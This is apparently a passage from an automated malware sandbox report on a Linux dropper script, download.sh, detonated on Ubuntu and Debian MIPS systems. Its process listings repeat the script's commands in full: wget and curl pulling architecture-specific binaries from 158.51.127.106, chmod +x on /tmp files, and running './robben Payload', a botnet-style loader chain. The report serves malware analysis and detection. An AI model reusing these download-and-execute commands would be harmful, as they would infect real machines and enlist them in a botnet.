N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

182s

Max time network

183s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-niFsCP systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-niFsCP systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-QQoRad systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian9-mipsbe-20240611-en

Max time kernel

182s

Max time network

253s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-a081f6d4a0c548d19a522f73bcbdff25-systemd-timedated.service-GOfuOq]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben systemd-private-a081f6d4a0c548d19a522f73bcbdff25-systemd-timedated.service-GOfuOq]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
